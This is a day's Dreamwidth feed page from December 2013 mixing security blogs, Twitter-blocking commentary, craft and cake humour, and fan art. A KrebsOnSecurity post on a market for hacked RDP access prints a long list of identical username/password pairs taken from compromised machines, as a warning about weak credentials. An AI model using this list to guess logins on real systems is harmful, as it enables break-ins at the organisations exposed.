President Obama and the Intelligence Community
Dec. 13th, 2013 01:24 pm![[syndicated profile]](http://www.dreamwidth.org/img/silk/identity/feed.png){kind=small}
bruce_schneier_feedReally good article from the New Yorker.
bruce_schneier_feed#blockgate and the changes to Twitter’s block behavior
Dec. 13th, 2013 06:26 pmgeekfeminism_feedI posted this yesterday on my personal blog, originally titled “Changes to Twitter’s block behavior – and a workaround.” I wanted to share it with the readers of Geek Feminism as well, as I think blocking on social networks and the right to exist in public harassment is something near and dear to many of our hearts, and what I hear is now being called “#blockgate” / “#restoreblock” / #restoretheblock is just the latest round in a long history of such discussions. It was a living post I updated as information came in about Twitter’s blocking policy change, hence the various updates and added Tweets.
TL;DR I hate the changes to Twitter’s blocking, and you can get around them by marking your account private, blocking the person, then going back to public. This will cause them to unfollow you. I hope the powers that Tweet reconsider this change.
Update: so this happened…
We're reverting the changes to block functionality. https://t.co/H3W3V27rKN
— Twitter (@twitter) December 13, 2013
Yay!
Twitter posted an update today to their blocking functionality. In my opinion, it’s a real step backwards for the usability of Twitter for anyone with a large number of followers, or facing any kind of harassment.
It used to be that when you blocked someone, it would force them to “unfollow” you, in addition to hiding them from your mentions. This is no longer the case:
Note: If your account is public, blocking a user does not prevent that user from following you, interacting with your Tweets, or receiving your updates in their timeline. If your Tweets are protected, blocking the user will cause them to unfollow you.
The obvious objection to my objection is “well your stuff is public anyway, they could just make a new account” – the thing is, this reflects a fundamental misunderstanding of 1) how people use blocking and 2) how harassers operate.
People use blocking to force unfollows.
I have nearly 9000 followers (which I find fairly hilarious as I mostly post fart jokes, but whatevs)(clarifying for new visitors: I actually tweet about computer security, privacy, feminism, open source, and how weird being a Canadian living in the US is – and more Bitcoin jokes than fart jokes). Something that happens pretty often is that someone will follow me and start replying to things I post or retweet in an aggressive or annoying way. I am particularly conscious of when people do this to folks I retweet – I feel like I have a responsibility to not expose people I retweet to douchebaggery on my watch, so I block people who demonstrate a pattern of being jerks. My friend Ellie made this in response to one of the times I retweeted her:
I realize that I’m directing a lot of traffic at folks when I retweet them, and I don’t want to expose them to jerks. This change prevents me from curating my followers in the same way as I curate my feed.
Harassers are easily distracted, and many just go away
Blocking, even on a public account, is surprisingly effective at dealing with low-grade harassment. Most harassers just aren’t that invested in the person they are bothering, and putting up the tiniest roadblock will make them move on to their next target. I had this conversation with a Googler shortly after G+ shipped, as its blocking behavior was at the time the same as the new Twitter behavior. I have no idea what it is now because I hate G+ and don’t use it, and I realized that this may be unintuitive to someone who hasn’t experienced harassment before – but trust me, as someone who has, it works a lot of the time. Which is great!
Update: Some who read the above argument think that it’s a “false sense of security” – there’s nothing false about effectively driving away a large percentage of drive-by harassment. I think people pretty broadly get that if you have a public feed, and block someone, that that person can just log out to read your feed – there really are a large number of users, and I say this from personal experience, who won’t bother making a new account, they will just move on. I want to keep being able to handle those users easily.
Telling users facing harassment to just make their account private punishes them, not harassers
This is just shitty and not ok, and I hope it needs no further explanation.
A Workaround
If you make your account private, then block the person, then make it public again, it emulates the old behavior and makes them unfollow you. It’s a pain, but it works. It will not prevent them from re-following you, however – so it’ll only work on the least motivated harassers.
Another Workaround
My friend shadowspar pointed out that you can still force an unfollow by marking someone as spam:
@hypatiadotca aiui reporting ppl for spam still makes them force-unfollow. gonna be a lot more spam reports, lolsob https://t.co/UFz7OSt8ua
— Rick Scott (@shadowspar) December 12, 2013
Looks like I’m going to be misusingrepurposing the spam report button more frequently :(
Update: or not:
BTW blocking and reporting for spam DOES NOT WORK, Twitter just didn't update their documentation properly… *facepalm*
— Oolon (@ool0n) December 12, 2013
World War II Anecdote about Trust and Security
Dec. 13th, 2013 11:20 ambruce_schneier_feedThis is an interesting story from World War II about trust:
Jones notes that the Germans doubted their system because they knew the British could radio false orders to the German bombers with no trouble. As Jones recalls, "In fact we did not do this, but it seemed such an easy countermeasure that the German crews thought that we might, and they therefore began to be suspicious about the instructions that they received."The implications of this are perhaps obvious but worth stating nonetheless: a lack of trust can exist even if an adversary fails to exploit a weakness in the system. More importantly, this doubt can become a shadow adversary. According to Jones, "...it was not long before the crews found substance to their theory [that is, their doubt]." In support of this, he offers the anecdote of a German pilot who, returning to base after wandering off course, grumbled that "the British had given him a false order."
I think about this all the time with respect to our IT systems and the NSA. Even though we don't know which companies the NSA has compromised -- or by what means -- knowing that they could have compromised any of them is enough to make us mistrustful of all of them. This is going to make it hard for large companies like Google and Microsoft to get back the trust they lost. Even if they succeed in limiting government surveillance. Even if they succeed in improving their own internal security. The best they'll be able to say is: "We have secured ourselves from the NSA, except for the parts that we either don't know about or can't talk about."
Hacked Via RDP: Really Dumb Passwords
Dec. 13th, 2013 03:18 pmkrebsonsecurity_feedBusinesses spend billions of dollars annually on software and hardware to block external cyberattacks, but a shocking number of these same organizations shoot themselves in the foot by poking gaping holes in their digital defenses and then advertising those vulnerabilities to attackers. Today’s post examines an underground service that rents access to hacked PCs at organizations that make this all-too-common mistake.
Makost[dot]net is a service advertised on cybercrime forums which sells access to “RDPs”, mainly Microsoft Windows systems that have been configured (poorly) to accept “Remote Desktop Protocol” connections from the Internet. Windows ships with its own RDP interface built-in; to connect to another Windows desktop or server remotely, simply fire up the Remote Desktop Connection utility in Windows, type in the Internet address of the remote system, and enter the correct username and password for a valid user account on that remote system. Once the connection is made, you’ll see the remote computer’s desktop as if you were sitting right in front of it, and have access to all its programs and files.
![Makhost[dot]net sells access to thousands of hacked RDP installations. Prices range from $3 to $10 based on a variety of qualities, such as the number of CPUs, the operating system version and the PC's upload and download speeds.](http://krebsonsecurity.com/wp-content/uploads/2013/12/rdps-1.png)
Makhost[dot]net sells access to thousands of hacked RDP installations. Prices range from $3 to $10 based on a variety of qualities, such as the number of CPUs, the operating system version and the PC’s upload and download speeds.
Makost currently is selling access to more than 6,000 compromised RDP installations worldwide. As we can see from the screen shot above, hacked systems are priced according to a combination of qualities of the server:
- city, state, country of host;
- administrative or regular user rights;
- operating system version;
- number and speed of computer processors;
- amount of system memory;
- network download and upload speeds;
- NAT or direct
KrebsOnSecurity was given a glimpse inside the account of a very active user of this service, an individual who has paid more than $2,000 over the past six months to purchase some 425 hacked RDPs. I took the Internet addresses in this customer’s purchase history and ran WHOIS database lookups on them all in a bid to learn more about the victim organizations. As expected, roughly three-quarters of those addresses told me nothing about the victims; the addresses were assigned to residential or commercial Internet service providers.
But the WHOIS records turned up the names of businesses for approximately 25 percent of the addresses I looked up. The largest group of organizations on this list were in the manufacturing (21 victims) and retail services (20) industries. As I sought to categorize the long tail of other victim organizations, I was reminded of the Twelve Days of Christmas carol.
twelve healthcare providers;
ten education providers;
eight government agencies;
seven technology firms;
six insurance companies;
five law firms;
four financial institutions;
three architects;
two real estate firms;
and a forestry company (in a pear tree?)
How did these companies end up for sale on makost[dot]net? That is explained deftly in a report produced earlier this year by Trustwave, a company which frequently gets called in when companies experience a data breach that exposes credit card information. Trustwave looked at all of the breaches it responded to in 2012 and found — just as in years past — “IP remote access remained the most widely used method of infiltration in 2012. Unfortunately for victim organizations, the front door is still open.”
The report continues:
“Organizations that use third-party support typically use remote access applications like Terminal Services (termserv) or Remote Desktop Protocol (RDP), pcAnywhere, Virtual Network Client (VNC), LogMeIn or Remote Administrator to access their customers’ systems. If these utilities are left enabled, attackers can access them as though they are legitimate system administrators.”
Source: Trustwave 2013 Global Security Report
“Would-be attackers simply scan blocks of Internet addresses looking for hosts that respond to queries on one of these ports. Once they have a focused target list of Internet addresses with open remote administration ports, they can move on to the next part of the attack: The number 2 most-exploited weakness: deafult/weak credentials.”
In case the point wasn’t clear enough yet, I’ve gathered all of the username and password pairs picked by all 430 RDP-enabled systems that were sold to this miscreant. As evidenced by the list below, the attackers simply needed to scan the Internet for hosts listening on port 3389 (Microsoft RDP), identify valid usernames, and then try the same username as the password. In each of the following cases, the username and password are the same.
Some of these credential pairs even give you an idea of the type of organization involved, the employee account that was compromised (“intern,” “techsupport,”); the purpose of the hacked system (“payroll”, “fax,” “scanner,” “timeclock”); even the geographic location of the compromised PC within the organization (e.g., “front desk,” “conference room,” “garage”). Incredibly, some of the systems appear to be named after actual security features or backup devices (“symantec,” “sonicwall,” “sophos”):
owner owner
showroom showroom
operations operations
train train
test test
colin colin
robert robert
install install
besadmin besadmin
tony tony
guest guest
symantec symantec
stacey stacey
stephanie stephanie
jessica jessica
install install
frontdesk frontdesk
sophos sophos
tim tim
lisa lisa
guest guest
guest guest
timeclock timeclock
dale dale
djohnson djohnson
john john
staff staff
student student
cw cw
guest guest
inventory inventory
aspnet aspnet
scanner scanner
tablet1 tablet1
timeclock timeclock
rsmith rsmith
tara tara
gary gary
user user
billing1 billing1
shipping1 shipping1
warehouse warehouse
scott scott
cnc cnc
training training
personnel personnel
template template
training training
faxserver faxserver
nicole nicole
sales sales
jbrown jbrown
driver driver
ksmith ksmith
sys sys
engineering engineering
gking gking
guest guest
kclark kclark
kwebb kwebb
guest1 guest1
robert robert
AdMiNiStRaToR AdMiNiStRaToR
ipad ipad
rae rae
canon canon
shipping shipping
fax fax
remote1 remote1
mission mission
reporter reporter
dispatch dispatch
guard guard
rm rm
marcia marcia
sales sales
makik makik
kbrown kbrown
kbrown kbrown
ray ray
jrobinson jrobinson
shop shop
remote remote
dharris dharris
user user
bkexec bkexec
cmm cmm
toolcrib toolcrib
test test
temp temp
sbrown sbrown
dispatch dispatch
carpet carpet
laura laura
techsupport techsupport
bkexec bkexec
ganderson ganderson
buexec buexec
twadmin twadmin
acs acs
acs acs
bkexec bkexec
testu testu
bookkeeper bookkeeper
rtcservice rtcservice
jcampbell jcampbell
mlee mlee
email email
owner owner
bethb bethb
sisadmin sisadmin
cmartinez cmartinez
beadmin beadmin
mattp mattp
conf conf
prod prod
ws ws
jackie jackie
tempadmin tempadmin
install install
support support
wendy wendy
ricoh ricoh
simmons simmons
agarcia agarcia
jens jens
prod prod
timeclock timeclock
specialist specialist
christine christine
training training
sqlexec sqlexec
production production
testuser testuser
garage garage
sms sms
ldap ldap
sharepoint sharepoint
epicor epicor
epicor epicor
sandy sandy
resource resource
carrie carrie
nancy nancy
remote remote
lisa lisa
sales sales
kristina kristina
facilities facilities
erika erika
seagate seagate
mmills mmills
checkout checkout
susan susan
peter peter
insurance insurance
Administrator Administrator
maureen maureen
mike mike
training training
av av
schedule schedule
brad brad
timeclock timeclock
awilson awilson
spadmin spadmin
cecilia cecilia
renee renee
fax fax
sonny sonny
joey joey
caroot caroot
xray xray
dallen dallen
triage triage
ewilliams ewilliams
djordan djordan
clerk clerk
danny danny
bkupexec bkupexec
bu bu
monroe monroe
mmiller mmiller
seagate seagate
mmurray mmurray
recruiting recruiting
jsmith jsmith
jwilson jwilson
buexec buexec
mikeg mikeg
jking jking
bobc bobc
caroot caroot
kronos kronos
jgreen jgreen
bkupexec bkupexec
lab lab
jaime jaime
davidf davidf
kronos kronos
xray xray
rbrown rbrown
bizhub bizhub
julie julie
bec bec
checkout checkout
tuser tuser
bjohnson bjohnson
jbox jbox
dataentry dataentry
itsupport itsupport
sharepoint sharepoint
pc pc
volunteer volunteer
mail mail
konica konica
mill mill
canon canon
volunteer volunteer
heidi heidi
carla carla
tracy tracy
frontdesk frontdesk
driver driver
operations operations
trainer trainer
accounts accounts
labuser labuser
production production
jsmith jsmith
sup890 sup890
installer installer
help help
intern intern
la la
timeclock timeclock
confrm confrm
assembly assembly
john john
spadmin spadmin
jdoe jdoe
bloomberg bloomberg
resume resume
attach attach
assembly assembly
faxes faxes
faxes faxes
aevans aevans
tjones tjones
dbagent dbagent
Scanner Scanner
frontoffice frontoffice
Billing Billing
Nurse Nurse
MS MS
buexec buexec
xray xray
joan joan
frontdesk frontdesk
bkupexec bkupexec
kjohnson kjohnson
marcia marcia
kbrown kbrown
str str
awilliams awilliams
lsmith lsmith
voicemail voicemail
lsmith lsmith
wilkerson wilkerson
wilkerson wilkerson
wilkerson wilkerson
faxadmin faxadmin
faxadmin faxadmin
faxadmin faxadmin
vismail vismail
aspuser aspuser
jh jh
pmartin pmartin
tammy tammy
melanie melanie
mfg mfg
dwright dwright
sharepoint sharepoint
mobile mobile
forms forms
conference conference
examroom examroom
insurance insurance
confroom confroom
archiver archiver
Production Production
restore restore
Email Email
export export
Payroll Payroll
schulung schulung
tablet tablet
temp temp
cci cci
michele michele
jimm jimm
techsupport techsupport
exadmin exadmin
randerson randerson
ecopy ecopy
triage triage
ecopy ecopy
pool pool
jcampbell jcampbell
labcorp labcorp
jtaylor jtaylor
dmartin dmartin
markd markd
rsvp rsvp
beadmin beadmin
ataylor ataylor
police police
backup backup
template template
presentation presentation
setup setup
jeffm jeffm
spiceworks spiceworks
labcorp labcorp
croom croom
vorlage vorlage
summit summit
exchange exchange
user2 user2
corpconf corpconf
exadmin exadmin
rrobinson rrobinson
tserver tserver
faxes faxes
faxes faxes
cmm cmm
west west
shipping shipping
SYSTRAY SYSTRAY
scanuser scanuser
besadmin besadmin
davidm davidm
labcorp labcorp
cnc cnc
faxes faxes
faxes faxes
assist assist
toshiba toshiba
labcorp labcorp
exadmin exadmin
tadmin tadmin
resumes resumes
resumes resumes
scan1 scan1
shipping shipping
adminsch adminsch
exchangeadmin exchangeadmin
debbie debbie
edi edi
kate kate
exam exam
exam2 exam2
workstation2 workstation2
trainer2 trainer2
scanner scanner
cs cs
books books
katie katie
Chief Chief
ricoh ricoh
konica konica
laurie laurie
classroom classroom
pt pt
mill mill
staff2 staff2
research research
frontdesk frontdesk
dispatch2 dispatch2
pete pete
smiller smiller
Office Office
conference conference
bookkeeper bookkeeper
sales1 sales1
router router
user1 user1
fax fax
exchadmin exchadmin
stacy stacy
oncall oncall
postgres postgres
toolroom toolroom
backups backups
ricoh ricoh
confroom confroom
production production
jake jake
kitchen kitchen
client2 client2
archive archive
ws ws
delia delia
qbdataserviceuser qbdataserviceuser
brac brac
spd spd
sonicwall sonicwall
rec rec
itadmin itadmin
pack pack
volunteer volunteer
mail mail
printer printer
south south
testing testing
testing testing
parts parts
conferenceroom conferenceroom
voicemail voicemail
reports reports
parts parts
voicemail voicemail
shipping shipping
scanner scanner
training training
watchdog watchdog
amanda amanda
user4 user4
student1 student1
lo lo
jackie jackie
scan scan
classroom classroom
client1 client1
client1 client1
If you’ve read this far, I hope it’s clear by now that the easiest way to get your systems hacked using RDP is to pick crappy credentials. Unfortunately, far too many organizations that end up for sale on services like this one are there because they outsourced their tech support to some third-party company that engages in this sort of sloppy security. Fortunately, a quick external port scan of your organization’s Internet address ranges should tell you if any RDP-equipped systems are enabled. Here are a few more tips on locking down RDP installations.
Readers who liked this story may also enjoy this piece — Service Sells Access to Fortune 500 Firms — which examined a similar service for selling hacked RDP systems.
This Week in Pics: Cat Onesies, Cross Stich, and Haunted HDR
Dec. 13th, 2013 10:00 amepbot_feedWe've been struggling with Lily's over-grooming again, so the vet has us trying new meds. While we waited for those to kick in, though, we needed to prevent her licking a bad spot on her side - and desperate times called for desperate-but-adorable measures:
Perfect for shipping or stacking, too! Just use a little blob of E-6000 to stick it to the ribbon. (And if you spell out the name with leftover scrapbooking stickers, you don't need a tag!)
Btw, I love wrapping so much I used to beg my friends to bring over their gifts so I could wrap everything for them. Please tell me I'm not the only one.
That's a hacked-up baby onesie - and Lily was surprisingly pretty ok with it.
It worked, too; her side is healed and she's back to being her nekkid furry self. :)
I got a Christmas card in the mail that put a wonderful grin on my face:
AnnaMay! I love that her folks used one of my pics for their photo card - LOVE. IT.
I'm working on a new cross stitch pattern:
Not gonna lie: I was tempted to stop there. :D
I've been watching Arrow while I stitch each night, and it's not bad! The main guy Oliver makes Anakin in The Phantom Menace look animated, and all of the characters are so gorgeous it's actually kind of annoying (ie the "awkward" tech girl who just stepped out of a Victoria's Secret catalog), but the story so far is great. Plus Harry Dresden is in it, so, booyah.
I discovered those cheap plastic snowflake ornaments you see everywhere make grrr-reat! gift bows:
Btw, I love wrapping so much I used to beg my friends to bring over their gifts so I could wrap everything for them. Please tell me I'm not the only one.
I don't mention it much, but John and I meet readers out at Disney almost every week some months. It's a fun way to hang out with fellow geeks, and we've now met new friends from all over the country/world that way. (Plus some weeks it's the only thing that gets me to leave the house - and you just can't put a value on that.)
Anyway, Wednesday night I spent a blissful few hours with Rachel - my new photography buddy - while her hubby Jeremy and John patiently waited for us to take oodles of long-exposure HDR shots around the Magic Kingdom. My favorite was when a cast member let us hop the queue chains in front of the Haunted Mansion, so we could sit on the ground and get shots like this:
I'll post a few more later, when I'm done playing with them all in Photomatrix. (Although I have a feeling Rachel's will put mine to shame; the woman knows her stuff!)
I'll post a few more later, when I'm done playing with them all in Photomatrix. (Although I have a feeling Rachel's will put mine to shame; the woman knows her stuff!)
And now for the winner of this month's art roundup, since I'd like to mail it out in time for Christmas:
Congratulations, Sarah Wilson!
Please e-mail me your mailing address & choice of art from my Pinterest give-away board!
Have a great weekend, guys!
FROSTED FEAR: The Snow Man Cometh
Dec. 13th, 2013 02:01 pmcakewrecks_feedThis Friday the 13th...
Someone...
is watching:
But it's not Santa.
He could be in your basement.
He could be in your room.
But most likely...
HE'S IN YOUR BAKERY.
"Diet soda? You know how bad that stuff is for you?"
So run, run, run, as fast as you can:
Because these snowmen:
are out
FOR BLOOD:
[Wilhelm scream]
There will be FIGHTS:
"Put 'em up, ya frosted flake!"
There will be PUNS:
"A-HA! Who's disarmed now, bee-yotch??"
And HEADS will ROLL:
"Little help here?"
"We'll bite your legs off!"
But mostly...
there will...
be...
TERROR.
At least until the hot cocoa is ready.
Then those suckers are goin' DOWN.
Thanks to Adria P., Mark H., Anony M., Cheyenne A., Jessie T., Andi L., Vanessa M., Bethany S., Tom B., and Dyan B., who are stockpiling flame throwers, just in case. (And don't worry, guys; I'll bring the marshmallows!)
Book: Pink Brain Blue Brain
Dec. 13th, 2013 01:00 pmaccidentallyincode_feed
Pink Brain Blue Brain (Amazon) is a fascinating book, covering the research into the extent of gender differences at birth, and how socialisation, education, and play make them bigger.
Differences are very, very minor in babies (studies showing otherwise are problematic, for example, not blind). Notably, boys tend to be more fussy (more emotionally needy, despite later becoming less emotionally aware), and as they grow boys are more boisterous and physically stronger. By contrast, girls are more mentally mature, and happier to sit and read for example – they have better fine motor skills.
Boys very slightly better on some specific spatial skills, this is exacerbated by childhood play – “boy”-play encourages spatial skills (e.g. throwing balls, building blocks). “Girl”-play encourages verbal skills, and fine motor skills (e.g. playing families, colouring). The result is that girls do better at reading and especially writing, while boys do better at spatial skills, which is a component of math.
Under-estimating girls starts early, for example, underestimating how steep a slope they would be willing to crawl down (near correct for boys).
A key and really important point is that differences are heavily influenced by socioeconomic status, with fewer gender differences in higher socio-economic families, and in those that are more egalitarian families.
This makes me think, that much of the critique about Goldiblox comes from people of high socio-economic status, who are more likely to eschew traditional roles, or at least have very involved fathers (who encourage more physical play that helps girls expand their spatial awareness). This toy isn’t needed by them. One factoid in the book is that 88% of lego kits bought for boys originally. My impression is the critique comes from the kind of people who fall in the 12%.
One such point is that the toy is for adults. Well yes, because adults buy the toys. Children start off with such tiny differences, and then are socialised in such a way that they increase exponentially. This changes as adults behave differently – such as buying a pink toy that emphases spatial awareness rather than a pink toy that emphases verbal and fine motor skills. In fact need for pink blocks is explicitly called out in the book.
I agree with parts of the critique – it is mostly marketing, is isn’t complicated enough, it’s not a perfect solution. The thing is, there is something pretty close to a perfect solution – it’s hands on learning, encouraging vocalisation and reading in boys, and spatial awareness in girls. Helping with play that addresses the minuscule differences, rather than exacerbates them. But this is intensive, and expensive, and may not be an option for those that need it most.
Notes toward a rebuttal of fatphobia in the vegie-growing scene
Dec. 13th, 2013 08:56 pm![[personal profile]](http://www.dreamwidth.org/img/silk/identity/user.png){kind=small}
skudJust somewhere to keep notes re: this previous query and potentially writing a post about this.
( content warning: rebuttal of fatphobia/obesity epidemic rhetoric/etc )
( content warning: rebuttal of fatphobia/obesity epidemic rhetoric/etc )
Fatphobia links sought
Dec. 13th, 2013 08:47 pmskudDoes anyone have any good links/resources to articles rebutting/fighting fatphobia particularly in the context of sustainable food/food systems reform/etc?
Examples of the sorts of things I want to rebut behind the cut.
( content warning: fat-phobia/obesity epidemic/etc )
There are a zillion reasons to grow food/have better food systems/etc without hating on the fat people -- many of whom already grow and eat vegies, and many others have limited access to vegies and greater likelihood of obesity as dual symptoms of deeper underlying stuff (eg. poverty).
So, are there any good essays about this already? I'm sure I've read a bunch, eg. criticising Michelle Obama, Jamie Oliver, or Michael Pollan. I can't find anything that's quite right, though.
Examples of the sorts of things I want to rebut behind the cut.
( content warning: fat-phobia/obesity epidemic/etc )
There are a zillion reasons to grow food/have better food systems/etc without hating on the fat people -- many of whom already grow and eat vegies, and many others have limited access to vegies and greater likelihood of obesity as dual symptoms of deeper underlying stuff (eg. poverty).
So, are there any good essays about this already? I'm sure I've read a bunch, eg. criticising Michelle Obama, Jamie Oliver, or Michael Pollan. I can't find anything that's quite right, though.
Hacker School Gets an A on the Bechdel Test
Dec. 13th, 2013 04:24 amgeekfeminism_feed
NAND and NOR gate sketch, coincidentally in the shape of a heart – by me this week
cross-posted from Cogito, Ergo Sumana
When part of the joy of a place is that gender doesn’t matter, it’s hard to write about that joy, because calling attention to gender is the opposite of that. I want to illustrate this facet of my Hacker School experience: mostly, Hacker Schoolers of all genders talk about mostly the same things. And we talk about them in all gender combinations — including, just by chance, among women.
The “Bechdel Test” asks whether a work of fiction includes at least two women with names who talk to each other about something other than a man. Thus in my blog I have an occasional series listing topics I’ve discussed with other women. My life passes the Bechdel Test! ;-)
So here is an list of some things I’ve discussed with Hacker School women. (About half the facilitators, cofounders, participants, and residents are women.)
Some Things Hacker School Women Talk About
- why LVars and set operations relate to current work in distributed systems
- The Kids Are All Right
- IRC etiquette, and when to use IRC instead of a mailing list, videocall or wiki
- troubleshooting
git-review - the Haiku operating system’s key features (many of them similar to BeOS)
- refactoring a function a guy wrote so it doesn’t do everything in
main()(technically breaks Bechdel?) - whether to work at a nonprofit or for-profit
- where is that maple syrup smell coming from? (answer: someone was making oatmeal)
- our GitHub report cards
- how to use machine learning techniques to train a Markov chain to generate funnier sentences
- how the hell Makefiles work
- what the hell a cuticle is
- binary search and Huffman coding
- saving time with useful Python standard library modules (string, time, os, etc.) and packages, e.g., requests
- Too Much Light Makes the Baby Go Blind
- where
pipgets its info (PyPI) - the Pythonic convention for reading from a file,
with open('file','r') as f, and the fact that it’s a context manager - when and how to use list comprehensions and dictionary comprehensions, generators and decorators,
ordandchr - why we use
passfor stub functions or classes instead ofreturn - birth control amortization
- how you would override Python’s default behavior to raise an exception when slicing a list with a negative int
- how to write a hill-climbing algorithm and why
- G.K. Chesterton’s use of the mystery genre
- what the #! (hashbang) line at the beginning of a script actually does
- song currently stuck in one’s head (“Gettin’ Jiggy Wid’ It”) and confusing “Wild Wild West” with “Back To The Future III”
- what it takes to work remotely
- security issues inherent in creating a sandboxed version of an interactive Python interpreter
- who put this post-it note on the fridge saying “No Java on Monday”? When? Did the author mean the beverage or the language? Was it descriptive or imperative? Why did they never take it down?
- an awesome 1982 Bell Labs video about UNIX featuring Lorinda Cherry
I could make this list probably ten times longer. My point is, if you don’t care about gender, Hacker School is awesome. If you’re irritated by the tech industry’s usual gender crap, Hacker School is blissfully free of it and you can — if you want — turn into someone who doesn’t care about gender for three months.*
You can apply now for the next batch — apply by Saturday night, December 14th.
* an oversimplification! But you get what I mean.
The Hearth's Warming Micro Comic Giveaway Event, Day Five
Dec. 12th, 2013 11:38 pmfrith posting in ![[community profile]](http://www.dreamwidth.org/img/silk/identity/community.png){kind=small}
ponyville_trot
Source: http://nyrx.reddawnstudio.com/images/Fu
OK, with the hour of grace, the deadline for the submitter is 8 pm EST sharp, one hour after the details for Day Six went up.
Another day, another two winners declared, one for the prompt, one for the coloured-in line drawing. ^_^ I think the prompt effort gets judged, while the coloured lineart winner is randomly chosen. Each winner receives as a prize of four IDW micro-fun pack comic sets. Each pack contains a (micro) comic, a poster, stickers, tattoo, and "how to" instructions for drawing a my little pony.
The Day Five assignment was "Draw ponies wrapping or unwrapping presents". Or colour in Pixelkitties' lineart of Pinkie in spy-goggles dangling upside-down from a rope. And the ongoing option to draw whatever you fancy. Or at least they "won't hold it against you". I really liked my violin pony that I submitted yesterday and that acted as an inhibitor. How could I top that? As a result I was late starting and just made the deadline. The pictures ended up in this gallery here. I drew Twilight Sparkle struggling to wrap a book and it was the last entry in the gallery. There were 31 submissions, same as yesterday.
For Day Six, the assignment is "What you love best about Hearth's Warming". The lineart to be coloured this time is of Diamond Tiara and Silver Spoon in royal regalia by Pixelkitties. The submitter is here, and the pictures end up in this gallery here.
I also like this one:
Source: http://hydrusbeta.deviantart.com/art/An
Changes to Twitter’s block behavior – and a workaround
Dec. 12th, 2013 11:29 pmhypatia_dot_ca_feedTL;DR I hate the changes to Twitter’s blocking, and you can get around them by marking your account private, blocking the person, then going back to public. This will cause them to unfollow you. I hope the powers that Tweet reconsider this change.
Update: so this happened…
We're reverting the changes to block functionality. blog.twitter.com/2013/reverting…—
Twitter (@twitter) December 13, 2013
Yay!
Twitter posted an update today to their blocking functionality. In my opinion, it’s a real step backwards for the usability of Twitter for anyone with a large number of followers, or facing any kind of harassment.
It used to be that when you blocked someone, it would force them to “unfollow” you, in addition to hiding them from your mentions. This is no longer the case:
Note: If your account is public, blocking a user does not prevent that user from following you, interacting with your Tweets, or receiving your updates in their timeline. If your Tweets are protected, blocking the user will cause them to unfollow you.
The obvious objection to my objection is “well your stuff is public anyway, they could just make a new account” – the thing is, this reflects a fundamental misunderstanding of 1) how people use blocking and 2) how harassers operate.
People use blocking to force unfollows.
I have nearly 9000 followers (which I find fairly hilarious as I mostly post fart jokes, but whatevs)(clarifying for new visitors: I actually tweet about computer security, privacy, feminism, open source, and how weird being a Canadian living in the US is – and more Bitcoin jokes than fart jokes). Something that happens pretty often is that someone will follow me and start replying to things I post or retweet in an aggressive or annoying way. I am particularly conscious of when people do this to folks I retweet – I feel like I have a responsibility to not expose people I retweet to douchebaggery on my watch, so I block people who demonstrate a pattern of being jerks. My friend Ellie made this in response to one of the times I retweeted her:
I realize that I’m directing a lot of traffic at folks when I retweet them, and I don’t want to expose them to jerks. This change prevents me from curating my followers in the same way as I curate my feed.
Harassers are easily distracted, and many just go away
Blocking, even on a public account, is surprisingly effective at dealing with low-grade harassment. Most harassers just aren’t that invested in the person they are bothering, and putting up the tiniest roadblock will make them move on to their next target. I had this conversation with a Googler shortly after G+ shipped, as its blocking behavior was at the time the same as the new Twitter behavior. I have no idea what it is now because I hate G+ and don’t use it, and I realized that this may be unintuitive to someone who hasn’t experienced harassment before – but trust me, as someone who has, it works a lot of the time. Which is great!
Update: Some who read the above argument think that it’s a “false sense of security” – there’s nothing false about effectively driving away a large percentage of drive-by harassment. I think people pretty broadly get that if you have a public feed, and block someone, that that person can just log out to read your feed – there really are a large number of users, and I say this from personal experience, who won’t bother making a new account, they will just move on. I want to keep being able to handle those users easily.
Telling users facing harassment to just make their account private punishes them, not harassers
This is just shitty and not ok, and I hope it needs no further explanation.
A Workaround
If you make your account private, then block the person, then make it public again, it emulates the old behavior and makes them unfollow you. It’s a pain, but it works. It will not prevent them from re-following you, however – so it’ll only work on the least motivated harassers.
Another Workaround
My friend shadowspar pointed out that you can still force an unfollow by marking someone as spam:
@hypatiadotca aiui reporting ppl for spam still makes them force-unfollow. gonna be a lot more spam reports, lolsob support.twitter.com/articles/64986—
Rick Scott (@shadowspar) December 12, 2013
Looks like I’m going to be misusingrepurposing the spam report button more frequently 
Update: or not:
BTW blocking and reporting for spam DOES NOT WORK, Twitter just didn't update their documentation properly… *facepalm*—
Oolon (@ool0n) December 12, 2013
on renaming my husband
Dec. 12th, 2013 07:05 pmbeableSo back when I was having those inane conversations with John Hopkins university to update my alumni info, I told them that my husband (or wife, it was never entirely clear), was named Gabriel (or possibly Gabrielle).
It turns out my husband is named Gonzalo. I hope that he isn't offended that I've been calling him Gabriel for over 10 years. Marriage takes effort, and I am just glad that ours has thrived despite my misremembering his name, our home address, or where we went to graduate school.
It turns out my husband is named Gonzalo. I hope that he isn't offended that I've been calling him Gabriel for over 10 years. Marriage takes effort, and I am just glad that ours has thrived despite my misremembering his name, our home address, or where we went to graduate school.
How the NSA Tracks Mobile Phone Data
Dec. 12th, 2013 12:55 pmbruce_schneier_feedLast week the Washington Post reported on how the NSA tracks mobile phones worldwide, and this week they followed up with source documents and more detail.
Barton Gellman and Ashkan Soltani are doing some fantastic reporting on the Snowden NSA documents. I hope to be able to do the same again, once Pierre Omidyar's media venture gets up and running.
Freezing Depths
Dec. 12th, 2013 10:08 amfrith posting in ponyville_trot
Source: http://otakuap.deviantart.com/art/freez
(Made just slightly small than the original in order to reduce the file size from 2.5 MB to 0.5MB)
Man Cakes For Beef Cakes
Dec. 12th, 2013 02:00 pmcakewrecks_feedRobyn T.'s family was celebrating four birthdays, and since the birthday boys were all guys, they asked for a "masculine" cake.
Instead, they got an inscription that took them all afternoon to puzzle out:
(I assume the first symbol was the top half of a "4" on the order sheet. Don't you just love written games of Telephone?)
See, your problem was trusting the bakers to know what's masculine, Robyn. Next time, just ask for the balloons to be bunched together with one long and two round ones:
INSTA-MANLINESS.
Or how about some cookies to remind the guys of the bachelor party they never had?
(I saw a balloon stripper on Night Court* once, so now I just assume all bachelor parties have them. DON'T BURST MY BUBBLE.)
Men don't like a lot of talking about their feelings and whatnot, so remember to keep your namby-pamby adjectives to yourself, if you please:
Replace the roses with crushed beer cans, and now we're REALLY talking.
Oh, hey, you know what men do like?
Tools:
...and peeing on things.
So the next time you need a masculine design, peeps, don't ask for it. Just find something in the case that already works!
Now just jam a power drill on this thing, and you're golden.
Thanks to Robyn T., Mandy B., Jamie D., Robb J., Jaleo, & Kallan for knowing there is nothing - NOTHING - more manly than chocolate skid marks.
*****
*PROOF:
